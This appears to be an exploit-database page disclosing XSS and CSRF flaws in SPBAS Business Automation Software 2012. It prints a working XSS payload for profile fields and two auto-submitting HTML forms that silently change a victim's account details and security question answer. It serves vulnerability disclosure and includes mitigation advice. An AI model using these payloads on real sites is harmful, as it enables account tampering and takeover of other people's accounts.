header-logo
Suggest Exploit
vendor:
SPBAS Business Automation Software
by:
Christy Philip Mathew
8,8
CVSS
HIGH
Cross-Site Scripting (XSS) & Cross-Site Request Forgery (CSRF)
79 (XSS) & 352 (CSRF)
CWE
Product Name: SPBAS Business Automation Software
Affected Version From: 2012
Affected Version To: 2012
Patch Exists: NO
Related CWE: N/A
CPE: a:spbas:spbas_business_automation_software
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2013

SPBAS Business Automation Software- XSS & CSRF Vulnerability

The SPBAS Business Automation Software is vulnerable to Cross-Site Scripting (XSS) and Cross-Site Request Forgery (CSRF). An attacker can inject malicious code into the first name and last name fields of the ‘My Info’ page, as well as the security question field. Additionally, an attacker can craft a malicious HTML page to change customer information and security question answer.

Mitigation:

The vendor should ensure that all user input is properly sanitized and validated before being used in the application. Additionally, the application should use anti-CSRF tokens to prevent CSRF attacks.
Source

Exploit-DB raw data:

# SPBAS Business Automation Software- XSS & CSRF Vulnerability
# Date: 16 June 2013
# Author: Christy Philip Mathew - www.offcon.org
# Vendor or Software Link: http://www.spbas.com
# Version: 2012


*1.XSS Vulnerability*

(a) Client Area -> My Info -> Update the first name and last name to

john"><img src=x onerror=prompt(0);>

(b) Update the security question to

john"><img src=x onerror=prompt(0);>


*2.Cross Site Request Forgery*

(a) Change Customer Information

<html>

     <body onload=document.forms[0].submit();>
    <form action="http://website.com/customers/index.php" method="POST">
      <input type="hidden" name="task" value="my_account" />
      <input type="hidden" name="tab" value="my_info" />
      <input type="hidden" name="update_my_info" value="y" />
      <input type="hidden" name="first_name" value="hacked" />
      <input type="hidden" name="last_name" value="hacked" />
      <input type="hidden" name="username" value="hacked" />
      <input type="hidden" name="form_submission"
value="Save Changes" />
      <input type="submit" value="Submit form" />
    </form>
  </body>
</html>


(b) Change Security Question Answer

<html>

   <body onload=document.forms[0].submit();>
    <form action="http://website.com/customers/index.php" method="POST">
      <input type="hidden" name="task" value="my_account" />
      <input type="hidden" name="tab" value="security_question" />
      <input type="hidden" name="change_security_question"
value="y" />
      <input type="hidden" name="question" value="1" />
      <input type="hidden" name="answer" value="test" />
      <input type="hidden" name="form_submission"
value="Save Changes" />
      <input type="submit" value="Submit form" />
    </form>
  </body>
</html>